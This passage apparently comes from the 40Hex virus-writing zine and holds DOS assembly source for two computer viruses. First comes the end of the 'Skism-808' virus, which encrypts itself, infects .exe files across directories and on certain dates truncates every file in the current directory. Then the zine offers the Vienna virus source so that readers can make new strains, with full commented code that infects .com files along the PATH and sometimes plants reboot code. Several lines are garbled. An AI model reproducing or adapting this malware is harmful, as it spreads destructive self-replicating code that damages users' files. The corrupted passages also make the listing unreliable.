                   CMP      BX,OFFSET VIRUS_CODE+VIRUS_SIZE

                                              ;ARE WE DONE WITH THE ENCRYPTION
                   JLE      XOR_LOOP                 ;NO?  KEEP GOING

                   POP      CX
                   RET
INFECTFILE:
                   MOV     DX,CODE_START         ;WHERE VIRUS STARTS IN MEMORY

                   MOV     BX,HANDLE                 ;LOAD BX WITH HANDLE

                   PUSH    BX                        ;SAVE HANDLE ON STACK

                   CALL    ENCRYPT                   ;ENCRYPT FILE

                   POP     BX                        ;GET BACK BX

                   MOV     CX,VIRUS_SIZE             ;NUMBER OF BYTES TO WRITE

                   MOV     AH,40H                    ;WRITE TO FILE

                   INT     21H                       ;

                   PUSH    BX

                   CALL    ENCRYPT                   ;FIX UP THE MESS

                   POP     BX

                   RET
VIRUS_CODE:
WILDCARDS    DB     "*",0              ;SEARCH FOR DIRECTORY ARGUMENT

FILESPEC     DB     "*.exe",0          ;SEARCH FOR exe FILE ARGUMENT

FILESPEC2    DB     "*.*",0

ROOTDIR      DB     "\",0              ;ARGUMENT FOR ROOT DIRECTORY

DIRDATA      DB     43 DUP (?)         ;HOLDS DIRECTORY dta

FILEDATA     DB     43 DUP (?)         ;HOLDS FILES dta

DISKDTASEG   DW     ?                  ;HOLDS DISK DTA SEGMENT

DISKDTAOFS   DW     ?                  ;HOLDS DISK DTA OFFSET

TEMPOFS      DW     ?                  ;HOLDS OFFSET

TEMPSEG      DW     ?                  ;HOLDS SEGMENT

DRIVECODE    DB     ?                  ;HOLDS DRIVE CODE

CURRENTDIR   DB     64 DUP (?)         ;SAVE CURRENT DIRECTORY INTO THIS

HANDLE       DW     ?                  ;HOLDS FILE HANDLE

ORIG_TIME    DW     ?                  ;HOLDS FILE TIME

ORIG_DATE    DW     ?                  ;HOLDS FILE DATE

ORIG_ATTR    DW     ?                  ;HOLDS FILE ATTR

IDBUFFER     DW     2 DUP  (?)         ;HOLDS VIRUS ID


VIRUS:       MOV    AX,3000H           ;GET DOS VERSION

             INT    21H                       ;

             CMP    AL,02H                    ;IS IT AT LEAST 2.00?

             JB     BUS1                      ;WON'T INFECT LESS THAN 2.00

             MOV    AH,2CH                    ;GET TIME

             MOV    ENCRYPT_VAL,DL            ;SAVE M_SECONDS TO ENCRYPT VAL SO

                                              ;THERES 100 MUTATIONS POSSIBLE

SETDTA:      MOV     DX,OFFSET DIRDATA        ;OFFSET OF WHERE TO HOLD NEW DTA

             MOV     AH,1AH                    ;SET DTA ADDRESS

             INT     21H                       ;

NEWDIR:


             MOV     AH,19H                    ;GET DRIVE CODE

             INT     21H                       ;

             MOV     DL,AL                     ;SAVE DRIVECODE

             INC     DL             ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER

             MOV     AH,47H                    ;GET CURRENT DIRECTORY

             MOV     SI, OFFSET CURRENTDIR     ;BUFFER TO SAVE DIRECTORY IN

             INT     21H                       ;


             MOV     DX,OFFSET ROOTDIR     ;MOVE DX TO CHANGE TO ROOT DIRECTORY

             MOV     AH,3BH                    ;CHANGE DIRECTORY TO ROOT

             INT     21H                       ;

SCANDIRS:


             MOV     CX,13H                    ;INCLUDE HIDDEN/RO DIRECTOYS
             MOV     DX, OFFSET WILDCARDS      ;LOOK FOR '*'

             MOV     AH,4EH                    ;FIND FIRST FILE

             INT     21H                       ;

             CMP     AX,12H                    ;NO FIRST FILE?

             JNE     DIRLOOP                   ;NO DIRS FOUND? BAIL OUT


BUS1:
             JMP    BUS
DIRLOOP:
             MOV     AH,4FH                    ;FIND NEXT FILE

             INT     21H                       ;

             CMP     AX,12H
             JE      BUS                       ;NO MORE DIRS FOUND, ROLL OUT


CHDIR:
             MOV     DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME

             MOV     AH,3BH                    ;CHANGE DIRECTORY

             INT     21H                       ;


             MOV     AH,2FH                    ;GET CURRENT DTA ADDRESS

             INT     21H                       ;

             MOV     [DISKDTASEG],ES           ;SAVE OLD SEGMENT

             MOV     [DISKDTAOFS],BX           ;SAVE OLD OFFSET

             MOV     DX,OFFSET FILEDATA        ;OFFSET OF WHERE TO HOLD NEW DTA

             MOV     AH,1AH                    ;SET DTA ADDRESS

             INT     21H            ;
SCANDIR:
             MOV     CX,07H                    ;FIND ANY ATTRIBUTE

             MOV     DX,OFFSET FILESPEC        ;POINT DX TO "*.com",0

             MOV     AH,4EH                    ;FIND FIRST FILE FUNCTION

             INT     21H                       ;

             CMP     AX,12H                    ;WAS FILE FOUND?

             JNE     TRANSFORM


NEXTEXE:
             MOV     AH,4FH                    ;FIND NEXT FILE

             INT     21H                       ;

             CMP     AX,12H                    ;NONE FOUND

             JNE     TRANSFORM                ;FOUND SEE WHAT WE CAN DO


             MOV     DX,OFFSET ROOTDIR     ;MOVE DX TO CHANGE TO ROOT DIRECTORY

             MOV     AH,3BH                    ;CHANGE DIRECTORY TO ROOT

             INT     21H                       ;

             MOV     AH,1AH                    ;SET DTA ADDRESS

             MOV     DS,[DISKDTASEG]           ;RESTORE OLD SEGMENT

             MOV     DX,[DISKDTAOFS]           ;RESTORE OLD OFFSET

             INT     21H                       ;

             JMP     DIRLOOP
BUS:
             JMP     NSFORM:     M
             MOV     AH,2FH                  ;TEMPORALLY STORE DTA

             INT     21H                       ;

             MOV     [TEMPSEG],ES              ;SAVE OLD SEGMENT

             MOV     [TEMPOFS],BX              ;SAVE OLD OFFSET

             MOV     DX, OFFSET FILEDATA + FILENAME


             MOV     BX,OFFSET FILEDATA               ;SAVE FILE...

             MOV     AX,[BX]+FILEDATE          ;DATE

             MOV     ORIG_DATE,AX              ;

             MOV     AX,[BX]+FILETIME          ;TIME

             MOV     ORIG_TIME,AX              ;    AND

             MOV     AX,[BX]+FILEATTR          ;

             MOV     AX,4300H

             INT     21H

             MOV     ORIG_ATTR,CX

             MOV     AX,4301H                  ;CHANGE ATTRIBUTES

             XOR     CX,CX                     ;CLEAR ATTRIBUTES

             INT     21H                       ;

             MOV     AX,3D00H                  ;OPEN FILE - READ

             INT     21H                       ;

             JC      FIXUP                     ;ERROR - FIND ANOTHER FILE

             MOV     HANDLE,AX                 ;SAVE HANDLE

             MOV     AH,3FH                    ;READ FROM FILE

             MOV     BX,HANDLE                 ;MOVE HANDLE TO BX

             MOV     CX,02H                    ;READ 2 BYTES

             MOV     DX,OFFSET IDBUFFER        ;SAVE TO BUFFER

             INT     21H                       ;


             MOV     AH,3EH                    ;CLOSE FILE FOR NOW

             MOV     BX,HANDLE                 ;LOAD BX WITH HANDLE

             INT     21H                       ;


             MOV     BX, IDBUFFER              ;FILL BX WITH ID STRING

             CMP     BX,02EBH                  ;INFECTED?

             JNE     DOIT                      ;SAME - FIND ANOTHER FILE



FIXUP:
             MOV     AH,1AH                    ;SET DTA ADDRESS

             MOV     DS,[TEMPSEG]              ;RESTORE OLD SEGMENT

             MOV     DX,[TEMPOFS]              ;RESTORE OLD OFFSET

             INT     21H                       ;

             JMP     NEXTEXE
DOIT:
             MOV     DX, OFFSET FILEDATA + FILENAME

             MOV     AX,3D02H                  ;OPEN FILE READ/WRITE ACCESS

             INT     21H                       ;

             MOV     HANDLE,AX                 ;SAVE HANDLE


             CALL    INFECTFILE

 ;
             MOV     AX,3EH                    ;CLOSE FILE
     ;
             INT     21H
ROLLOUT:
             MOV     AX,5701H               

             MOV     BX,HANDLE                 ;

             MOV     CX,ORIG_TIME              ;TIME AND

             MOV     DX,ORIG_DATE              ;DATE

             INT     21H                       ;


             MOV     AX,4301H                  ;RESTORE ORIGINAL ATTRIBUTES

             MOV     CX,ORIG_ATTR
     MOV     DX,OFFSET FILEDATA + FILENAME

             INT     21H                       ;
             MOV     BX,HANDLE
             MOV     AX,3EH                    ;CLOSE FILE
     ;
             INT     21H
             MOV     AH,3BH                    ;TRY TO FIX THIS

             MOV     DX,OFFSET ROOTDIR         ;FOR SPEED

             INT     21H                       ;

             MOV     AH,3BH                    ;CHANGE DIRECTORY

             MOV     DX,OFFSET CURRENTDIR      ;BACK TO ORIGINAL

             INT     21H                       ;

             MOV     AH,2AH                    ;CHECK SYSTEM DATE

             INT     21H                       ;

             CMP     CX,1991                   ;IS IT AT LEAST 1991?

             JB      AUDI                      ;NO? DON'T DO IT NOW

             CMP     DL,25                     ;IS IT THE 25TH?

             JB      AUDI                      ;NOT YET? QUIT

             CMP     AL,5                      ;IS fRIDAY?

             JNE     AUDI                      ;NO? QUIT

             MOV     DX,OFFSET DIRDATA         ;OFFSET OF WHERE TO HOLD NEW DTA

             MOV     AH,1AH                    ;SET DTA ADDRESS

             INT     21H                       ;

             MOV     AH,4EH                    ;FIND FIRST FILE

             MOV     CX,7H                     ;

             MOV     DX,OFFSET FILESPEC2       ;OFFSET *.*


lOOPS:
             INT     21H                       ;

             JC      AUDI                      ;ERROR? THEN QUIT

             MOV     AX,4301H                  ;FIND ALL NORMAL FILES

             XOR     CX,CX                     ;

             INT     21H                       ;

             MOV     DX,OFFSET DIRDATA + FILENAME

             MOV     AH,3CH                 ;FUCK UP ALL FILES IN CURRENT DIR

             INT     21H                       ;ERROR? QUIT

             MOV     AH,4FH                    ;FIND NEXT FILE

             JMP     LOOPS                     ;


AUDI:
             MOV     AX,4C00H                  ;END PROGRAM

             INT     21H                       ;

;
  THE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES.  dON'T
;
  JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.



WORDS_   DB   "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0

WORDS2   DB   "  dONT ALTER THIS CODE INTO Y3
         DB "  hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0

WORDS4   DB   "  yOU SISSYS.....",0


MAIN     ENDP

CODE     ENDS

END      MAIN



------------------------------------------------------------------------------


         hr
40hEX vOLUME 1 iSSUE 20011


         vIENNA AND vIOLATOR vIRUSES


         tHE vIENNA VIRUS, SINCE IT'S SOURCE CODE WAS RELEASED, HAS BECOME

         ONE OF THE MOST COMMON VIRUSES EVER.  nOT ONLY THAT BUT THERE ARE

         OVER 20 KNOWN STRAINS OF THIS VIRUS.  wE AT 40hEX WANT TO ADD ON TO

         THE LIST BY GIVING OUT THE SOURCE FOR THE ORGINAL vIENNA VIRUS AS

         WELL AS THE vIOLATOR-b SOURCE BY rABID.


------------------------------------------------------------------------------


mov_cx  macro   x
        db      0b9h

                          dw      x

                          endm



code    segment
        assume ds:code,ss:code,cs:code,es:code

org     $+0100h

;
*****************************************************************************
;
sTART OUT WITH A jmp AROUND THE REMAINS OF THE ORIGINAL .com FILE, INTO THE
;
VIRUS. tHE ACTUAL .com FILE WAS JUST AN int 20, FOLLOWED BY A BUNCH OF nops.
;
tHE REST OF THE FILE (FIRST 3 BYTES) ARE STORED IN THE VIRUS DATA AREA.
;
*****************************************************************************


vcode:  jmp     VIRUS



;tHIS WAS THE REST  OF THE ORIGINAL .com FILE. tINY AND SIMPLE, THIS TIME


nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop



;************************************************************
;
             tHE ACTUAL VIRUS STARTS HERE

;************************************************************


V_START EQU     $



VIRUS:  push    cx

        mov     dx,offset VIR_DAT       ;tHIS IS WHERE THE VIRUS DATA STARTS.

                                        ; tHE 2ND AND 3RD BYTES GET MODIFIED.

        cld                             ;pOINTERS WILL BE AUTO inCREMENTED

        mov     si,dx                   ;aCCESS DATA AS OFFSET FROM si

        add     si,FIRST_3              ;pOINT TO ORIGINAL 1ST 3 BYTES OF .com

        mov     di,offset 100h          ;CAUSE ALL .com FILES START AT 100h

        mov     cx,3
        repz    movsb                   ;rESTORE ORIGINAL FIRST 3 BYTES OF .com

        mov     si,dx                   ;kEEP si POINTING TO THE DATA AREA


;*******************************************************
;
         cHECK THE dos VERSION

;*************************************************************;
        mov     ah,30h

        int     21h


        cmp     al,0                    ;0 MEANS IT'S VERSION 1.x


        jnz     DOS_OK                  ;fOR VERSION 2.0 OR GREATER

        jmp     QUIT                    ;dON'T TRY TO INFECT VERSION 1.x



;*************************************************************;
   hERE IF THE dos VERSION IS HIGH ENOUGH FOR THIS TO WORK

;*************************************************************;
DOS_OK:
         push    es



;*************************************************************
;
         gET dta ADDRESS INTO es:bx

;*************************************************************;
       mov     ah,2fh

       int     21h


;*************************************************************;
                    sAVE THE dta ADDRESS

;*************************************************************;
      mov     [si+OLD_DTA],bx

      mov     [si+OLD_DTS],es         ;sAVE THE dta ADDRESS


      pop     es
;*************************************************************
;
sET dta TO POINT INSIDE THE VIRUS DATA AREA

;*************************************************************


      mov     dx,DTA                  ;oFFSET OF NEW dta IN VIRUS DATA AREA
;
      nop                             ;masm WILL ADD THIS nop HERE

      add     dx,si                   ;cOMPUTE dta ADDRESS

      mov     ah,1ah

      int     21h                    ;sET NEW dta TO INSIDE OUR OWN CODE



      push    es

      push    si

      mov     es,ds:2ch

      mov     di,0                    ;es:di POINTS TO ENVIRONMENT


;************************************************************
;
     fIND THE "path=" STRING IN THE ENVIRONMENT

;************************************************************


FIND_PATH:
      pop     si

      push    si                      ;gET si BACK

      add     si,ENV_STR              ;pOINT TO "path=" STRING IN DATA AREA

      lodsb
      mov     cx,offset 8000h         ;eNVIRONMENT CAN BE 32768 BYTES LONG

      repnz   scasb                   ;sEARCH FOR FIRST CHARACTER

      mov     cx,4
      ;************************************************************
;
      lOOP TO CHECK FOR THE NEXT FOUR CHARACTERS

      ;************************************************************


CHECK_NEXT_4:
     lodsb

     scasb

     jnz     FIND_PATH               ;iF NOT ALL THERE, ABORT & START OVER

     loop    CHECK_NEXT_4            ;lOOP TO CHECK THE NEXT CHARACTER


     pop     si

     pop     es

     mov     [si+PATH_AD],di         ;sAVE THE ADDRESS OF THE path

     mov     di,si

     add     di,WRK_SPC              ;fILE NAME WORKSPACE

     mov     bx,si                   ;sAVE A COPY OF si

     add     si,WRK_SPC              ;pOINT si TO WORKSPACE

     mov     di,si                   ;pOINT di TO WORKSPACE

     jmp     short   SLASH_OK



 ;**********************************************************
;
 lOOK IN THE path FOR MORE SUBDIRECTORIES, IF ANY

 ;**********************************************************


 SET_SUBDIR:
     cmp     word ptr [si+PATH_AD],0 ;iS path STRING ENDED?

     jnz     FOUND_SUBDIR            ;iF NOT, THERE ARE MORE SUBDIRECTORIES

     jmp     ALL_DONE                ;eLSE, WE'RE ALL DONE



     ;**********************************************************
;
     hERE IF THERE ARE MORE SUBDIRECTORIES IN THE PATH

     ;**********************************************************


FOUND_SUBDIR:
     push    ds

     push    si

     mov     ds,es:2ch               ;ds POINTS TO ENVIRONMENT SEGMENT

     mov     di,si

     mov     si,es:[di+PATH_AD]      ;si = path ADDRESS

     add     di,WRK_SPC              ;di POINTS TO FILE NAME WORKSPACE


;
    ;***********************************************************
;
     mOVE SUBDIRECTORY NAME INTO FILE NAME WORKSPACE

     ;***********************************************************


MOVE_SUBDIR:
     lodsb        ;gET CHARACTER

     cmp     al,';'                  ;iS IT A ';' DELIMITER?

     jz      MOVED_ONE               ;yES, FOUND ANOTHER SUBDIRECTORY

     cmp     al,0                    ;eND OF path STRING?

     jz      MOVED_LAST_ONE          ;yES

     stosb                           ;sAVE path MARKER INTO [di]

     jmp     short   MOVE_SUB


     ;******************************************************************
;
     mARK THE FACT THAT WE'RE LOOKING THROUGH THE FINAL SUBDIRECTORY

     ;******************************************************************


MOVED_LAST_ONE:

     mov     si,0



     ;******************************************************************
;
                  hERE AFTER WE'VE MOVED A SUBDIRECTORY

     ;******************************************************************


MOVED_ONE:
      pop     bx                      ;pOINTER TO VIRUS DATA AREA

      pop     ds                      ;rESTORE ds

      mov     [bx+PATH_AD],si         ;aDDRESS OF NEXT SUBDIRECTORY

      nop


      ;******************************************************************
;
                   mAKE SURE SUBDIRECTORY ENDS IN A "\"

      ;******************************************************************


      cmp     ch,'\'                  ;eNDS WITH "\"?

      jz      SLASH_OK                ;iF YES

      mov     al,'\'                  ;aDD ONE, IF NOT

      stosb



      ;******************************************************************
;
           hERE AFTER WE KNOW THERE'S A BACKSLASH AT END OF SUBDIR

     ;******************************************************************


SLASH_OK:
       mov     [bx+NAM_PTR],di         ;sET FILENAME POINTER TO NAME WORKSPACE

       mov     si,bx                   ;rESTORE si

       add     si,F_SPEC               ;pOINT TO "*.com"

       mov     cx,6

       repz
       movsb                   ;mOVE "*.com",0 TO WORKSPACE


       mov     si,bx



       ;*******************************************************************
;
                      fIND FIRST STRING MATCHING *.com

      ;*****************************************************************;
      mov     ah,4eh

      mov     dx,WRK_SPC
;
      nop                             ;masm WILL ADD THIS nop HERE

      add     dx,si                   ;dx POINTS TO "*.com" IN WORKSPACE

      mov     cx,3                    ;aTTRIBUTES OF rEAD oNLY OR hIDDEN ok

      int     21h


      jmp     short
FIND_FIRST



;*******************************************************************
;
              fIND NEXT asciiz STRINGMATCHING *.com

;*******************************************************************


FIND_NEXT:
      mov     ah,4fh

      int     21h


FIND_FIRST:

     jnb     FOUND_FILE              ;jUMP IF WE FOUND IT

     jmp     short   SET_SUBDIR      ;oTHERWISE, GET ANOTHER SUBDIRECTORY


     ;*******************************************************************
;
                           hERE WHEN WE FIND A FILE

    ;*******************************************************************


FOUND_FILE:
     mov     ax,[si+DTA_TIM]     ;gET TIME FROM dta

     and     al,1fh              ;mASK TO REMOVE ALL BUT SECONDS

     cmp     al,1fh                  ;62 SECONDS -> ALREADY INFECTED

     jz      FIND_NEXT               ;iF SO, GO FIND ANOTHER FILE


     cmp     word ptr [si+DTA_LEN],offset 0fa00h ;iS THE FILE TOO LONG?

    ja      FIND_NEXT               ;iF TOO LONG, FIND ANOTHER ONE


    cmp     word ptr [si+DTA_LEN],0ah ;iS IT TOO SHORT?

    jb      FIND_NEXT               ;tHEN GO FIND ANOTHER ONE


    mov     di,[si+NAM_PTR]         ;di POINTS TO FILE NAME

    push    si                      ;sAVE si

    add     si,DTA_NAM              ;pOINT si TO FILE NAME


    ;********************************************************************
;
                    mOVE THE NAME TO THE END OF THE PATH

   ;********************************************************************


MORE_CHARS:

    lodsb

    stosb

    cmp     al,0

    jnz     MORE_CHARS              ;mOVE CHARACTERS UNTIL WE FIND A 00



    ;*************************************************************
;
                    gET fILE aTTRIBUTES

   ;********************************************************************;
   pop     si
   mov     ax,offset 4300h

   mov     dx,WRK_SPC              ;pOINT TO \PATH\NAME IN WORKSPACE
;
   nop                             ;masm WILL ADD THIS nop HERE

   add     dx,si

   int     21h



   mov     [si+OLD_ATT],cx         ;sAVE THE OLD ATTRIBUTES



   ;********************************************************************
;
            rEWRITE THE ATTRIBUTES TO ALLOW WRITING TO THE FILE

  ;********************************************************************;
  mov     ax,offset 4301h         ;sET ATTRIBUTES

  and     cx,offset 0fffeh        ;sET ALL EXCEPT "READ ONLY" (WEIRD)

  mov     dx,WRK_SPC              ;oFFSET OF \PATH\NAME IN WORKSPACE
;
  nop                             ;masm WILL ADD THIS nop HERE

  add     dx,si                   ;pOINT TO \PATH\NAME

  int     21h


  ;********************************************************************
;
                  oPEN rEAD/wRITE CHANNEL TO THE FILE

 ;********************************************************************


  mov     ax,offset 3d02h         ;rEAD/wRITE

  mov     dx,WRK_SPC              ;oFFSET TO \PATH\NAME IN WORKSPACE
;
  nop                             ;masm WILL ADD THIS nop HERE

  add     dx,si                   ;pOINT TO \PATH\NAME

  int     21h


  jnb     OPENED_OK             ;iF FILE WAS OPENED ok

  jmp     FIX_ATTR                ;iF IT FAILED, RESTORE THE ATTRIBUTES



  ;*******************************************************************
;
                          gET THE FILE DATE & TIME

  ;*******************************************************************


OPENED_OK:
  mov     bx,ax

  mov     ax,offset 5700h

  int     21h


  mov     [si+OLD_TIM],cx         ;sAVE FILE TIME

  mov     [si+OL_DATE],dx         ;sAVETHE DATE


  ;*******************************************************************
;
  gET CURRENT SYSTEM TIME

  ;*******************************************************************;
  mov     ah,2ch

  int     21h



  and     dh,7                    ;lAST 3 BITS 0? (ONCE IN EIGHT)

  jnz     SEVEN_IN_EIGHT



  ;*******************************************************************
;
  tHE SPECIAL "ONE IN EIGHT" INFECTI  ON. iF THE ABOVE LINE WERE IN
;
  ITS ORIGINAL FORM, THIS CODE WOULD BE RUN 1/8 OF THE TIME, AND
;
  RATHER THAN APPENDING A COPY OF THIS VIRUS TO THE .com FILE, THE
;
  FILE WOULD GET 5 BYTES OF CODE THAT REBOOT THE SYSTEM WHEN THE
;
  .com FILE IS RUN.

  ;*******************************************************************



  mov     ah,40h                  ;wRITE TO FILE

  mov     cx,5                    ;fIVE BYTES

  mov     dx,si

  add     dx,REBOOT               ;oFFSET OF REBOOT CODE IN DATA AREA

  int     21h


  jmp     short   FIX_TIME_STAMP


  nop
  ;******************************************************************
;
        hERE'S WHERE WE INFECT A .com FILE WITH THIS VIRUS

  ;******************************************************************;
SEVEN_IN_EIGHT:
  mov     ah,3fh

  mov     cx,3

  mov     dx,FIRST_3
;
  nop                     ;masm WILL ADD THIS nop HERE

  add     dx,si

  int     21h             ;sAVE FIRST 3 BYTES INTO THE DATA AREA


  jb      FIX_TIME_STAMP  ;qUIT, IF READ FAILED


  cmp     ax,3            ;wERE WE ABLE TO READ ALL 3 BYTES?

  jnz     FIX_TIME_STAMP  ;qUIT, IF NOT
  ;******************************************************************
;
                mOVE FILE POINTER TO END OF FILE

 ;******************************************************************


 mov     ax,offset 4202h

 mov     cx,0

 mov     dx,0

 int     21h


 jb      FIX_TIME_STAMP     ;qUIT, IF IT DIDN'T WORK


 mov     cx,ax              ;dx:ax (LONG INT) = FILE SIZE

 mov     ax,3               ;sUBTRACT 3 (ok, SINCE dx MUST BE 0, HERE)

 mov     [si+JMP_DSP],ax    ;sAVE THE DISPLACEMENT IN A jmp INSTRUCTION


 add     cx,offset C_LEN_Y

 mov     di,si              ;pOINT di TO VIRUS DATA AREA

 sub     di,offset C_LEN_X
 ;pOINT di TO REFERENCE VIR_DAT, AT START OF PGM
 mov     [di],cx         ;mODIFY VIR_DAT REFERENCE:2ND, 3RD BYTES OF PGM



 ;*******************************************************************
;
WRITE VIRUS CODE TO FILE

;*******************************************************************


mov     ah,40h


mov_cx  VIRLEN                  ;lENGTH OF VIRUS, IN BYTES


mov     dx,si

sub     dx,offset CODELEN       ;lENGTH OF VIRUS CODE, GIVES STARTING

                                ; ADDRESS OF VIRUS CODE IN MEMORY

int     21h


jb      FIX_TIME_STAMP          ;jUMP IF ERROR


cmp     ax,offset VIRLEN        ;aLL BYTES WRITTEN?

jnz    FIX_TIME_STAMP          ;jUMP IF ERROR



;**********************************************************************
;
                mOVE FILE POINTER TO BEGINNING OF THE FILE

;**********************************************************************;
 mov     ax,offset 4200h

 mov     cx,0

 mov     dx,0

 int     21h


 jb      FIX_TIME_STAMP          ;jUMP IF ERROR



 ;**********************************************************************
;
               wRITE THE 3 BYTE jmpTo THE START OF THE FILE

;**********************************************************************

mov     ah,40h

mov     cx,3

mov     dx,si                   ;vIRUS DATA AREA

add     dx,JMP_OP               ;pOINT TO THE RECONSTRUCTED jmp

int     21h



;**********************************************************************
;
       rESTORE OLD FILE DATE & TIME, WITH SECONDS MODIFIED TO 62

;*********************************************************************


FIX_TIME_STAMP:
mov

mov     cx,[si+OLD_TIM]         ;oLD FILE TIME

and     cx,offset 0ffe0h

or      cx,1fh                  ;sECONDS = 31/30 MIN = 62 SECONDS

mov     ax,offset 5701h

int     21h
;**********************************************************************
;
                         cLOSE fILE

;**********************************************************************;
mov     ah,3eh

int     21h



;**********************************************************************
;
                     rESTORE oLD fILE aTTRIBUTES

;**********************************************************************


FIX_ATTR:
mov     ax,offset 4301h

mov     cx,[si+OLD_ATT]         ;oLD aTTRIBUTES

mov     dx,WRK_SPC
;
nop                             ;masm WILL ADD THIS nop

add     dx,si                   ;dx POINTS TO \PATH\NAME IN WORKSPACE

int     21h


;**********************************************************************
;
              hERE WHEN IT'S TIME TO CLOSE IT UP & END

;**********************************************************************


ALL_DONE:

push    ds
;**********************************************************************
;
                         rESTORE OLD dta

;**********************************************************************


mov     ah,1ah

mov     dx,[si+OLD_DTA]

mov     ds,[si+OLD_DTS]

int     21h


pop     ds


;*************************************************************************
;
cLEAR REGISTERS USED, & DO A WEIRD KIND OF jmp 100. tHE WEIRDNESS COMES
;
IN SINCE THE ADDRESS IN A REAL jmp 100 IS AN OFFSET, AND THE OFFSET
;
VARIES FROM ONE INFECTED FILE TO THE NEXT. bY pushING AN 0100h ONTO THE
;
STACK, WE CAN ret TO ADDRESS 0100h JUST AS THOUGH WE jmpED THERE.

;**********************************************************************


QUIT:

pop     cx

xor     ax,ax

xor     bx,bx

xor     dx,dx

xor     si,si

mov     di,offset 0100h

push    di

xor     di,di


ret     0ffffh


;************************************************************************
;
tHE VIRUS DATA STARTS HERE. iT'S ACCESSED OFF THE si REGISTER, PER THE

; COMMENTS AS SHOWN

;************************************************************************


VIR_DAT equ     $


        ;uSE THIS WITH (si + OLD_DTA)

OLDDTA_ dw      0           ;oLD dta OFFSET


                            ;uSE THIS WITH (si + OLD_DTS)

OLDDTS_ dw      0           ;oLD dta SEGMENT


                            ;uSE THIS WITH (si + OLD_TIM)

OLDTIM_ dw      0           ;oLD tIME


                            ;uSE THIS WITH (si + OL_DATE)

OLDATE_ dw      0           ;oLD DATE


                            ;uSE THIS WITH (si + OLD_ATT)

OLDATT_ dw      0           ;oLD FILE ATTRIBUTES




;hERE'S WHERE THE FIRST THREE BYTES OF THE ORIGINAL .com FILE GO.(si + FIRST_3)


FIRST3_ equ     $

int     20h

nop




;hERE'S WHERE THE NEW jmp INSTRUCTION IS WORKED OUT


;uSE THIS WITH (si + JMP_OP)

JMPOP_  db      0e9h                    ;sTART OF jmp INSTRUCTION


                                       ;uSE THIS WITH (si + JMP_DSP)

JMPDSP_ dw      0                       ;tHE DISPLACEMENT PART




;tHIS IS THE TYPE OF FILE  WE'RE LOOKING TO INFECT. (si + F_SPEC)


FSPEC_  db      '*.com',0

        ;uSE THIS WITH (si + PATH_AD)

PATHAD_ dw      0                       ;pATH ADDRESS


                                   ;uSE THIS WITH (si + NAM_PTR)

NAMPTR_ dw      0              ;pOINTER TO START OF FILE NAME


                               ;uSE THIS WITH (si + ENV_STR)

ENVSTR_ db      'path='       ;fIND THIS IN THE ENVIRONMENT


                              ;fILE NAME WORKSPACE (si + WRK_SPC)

WRKSPC_ db      40H DUP (0)

        ;uSE THIS WITH (si + DTA)

DTA_    db      16H DUP (0)         ;tEMPORARY dta GOES HERE


                                    ;uSE THIS WITH (s
iDTATIM_ dw      0,0                ;tIME STAMP IN dta
                                    ;uSE THIS WITH (si + DTA_LEN)

DTALEN_ dw      0,0               ;fILE LENGTH IN THE dta
                                  ;uSE THIS WITH (si + DTA_NAM)

DTANAM_ db      0dH DUP (0)       ;fILE NAME IN THE dta


                                  ;uSE THIS WITH (si + REBOOT)

REBOOT_ db      0eah,0f0h,0ffh,0ffh,0ffh ;fIVE BYTE far jmp TO ffff:fff0



LST_BYT equ     $                 ;aLL LINES THAT ASSEMBLE INTO CODE ARE

                                  ;  ABOVE THIS ONE



;*****************************************************************************
;
tHE VIRUS NEEDS TO KNOW A FEWDETAILS ABOUT ITS OWN SIZE AND THE SIZE OF ITS

; CODE PORTION. lET THE ASSEMBLER FIGURE OUT THESE SIZES AUTOMATICALLY.

;*****************************************************************************
VIRLEN  =       LST_BYT - V_START       ;lENGTH, IN BYTES, OF THE ENTIRE VIRUS

CODELEN =       VIR_DAT - V_START       ;lENGTH OF VIRUS CODE, ONLY

C_LEN_X =       VIR_DAT - V_START - 2   ;dISPLACEMENT FOR SELF-MODIFYING CODE

C_LEN_Y =       VIR_DAT - V_START + 100h ;cODE LENGTH + 100H, FOR psp



;*****************************************************************************
;
bECAUSE THIS CODE IS BEING APPENDED TO THE END OF AN EXECUTABLE FILE, THE

; EXACT ADDRESS OF ITS VARIABLES CANNOT BE KNOWN. aLL ARE ACCESSED AS OFFSETS

; FROM si, WHICH IS REPRESENTED AS VIR_DAT IN THE BELOW DECLARATIONS.

;*****************************************************************************


OLD_DTA =       OLDDTA_ - VIR_DAT       ;dISPLACEMENT TO THE OLD dta OFFSET

OLD_DTS =       OLDDTS_ - VIR_DAT       ;dISPLACEMENT TO THE OLD dta SEGMENT

OLD_TIM =       OLDTIM_ - VIR_DAT       ;dISPLACEMENT TO OLD FILE TIME STAMP

OL_DATE =       OLDATE_ - VIR_DAT       ;dISPLACEMENT TO OLD FILE DATE STAMP

OLD_ATT =       OLDATT_ - VIR_DAT       ;dISPLACEMENT TO OLD ATTRIBUTES

FIRST_3 =       FIRST3_ - VIR_DAT       ;dISPLACEMENT-1ST 3 BYTES OF OLD .com

JMP_OP  =       JMPOP_  - VIR_DAT       ;dISPLACEMENT TO THE jmp OPCODE

JMP_DSP =       JMPDSP_ - VIR_DAT       ;dISPLACEMENT TO THE 2ND 2 BYTES OF jmp

F_SPEC  =       FSPEC_  - VIR_DAT       ;dISPLACEMENT TO THE "*.com" STRING

PATH_AD =       PATHAD_ - VIR_DAT       ;dISPLACEMENT TO THE PATH ADDRESS

NAM_PTR =       NAMPTR_ - VIR_DAT       ;dISPLACEMENT TO THE FILENAME POINTER

ENV_STR =       ENVSTR_ - VIR_DAT       ;dISPLACEMENT TO THE "path=" STRING

WRK_SPC =       WRKSPC_ - VIR_DAT       ;dISPLACEMENT TO THE FILENAME WORKSPACE

DTA     =       DTA_    - VIR_DAT       ;dISPLACEMENT TO THE TEMPORARY dta

DTA_TIM =       DTATIM_ - VIR_DAT       ;dISPLACEMENT TO THE TIME IN THE dta

DTA_LEN =       DTALEN_ - VIR_DAT       ;dISPLACEMENT TO THE LENGTH IN THE dta

DTA_NAM =       DTANAM_ - VIR_DAT       ;dISPLACEMENT TO THE NAME IN THE dta

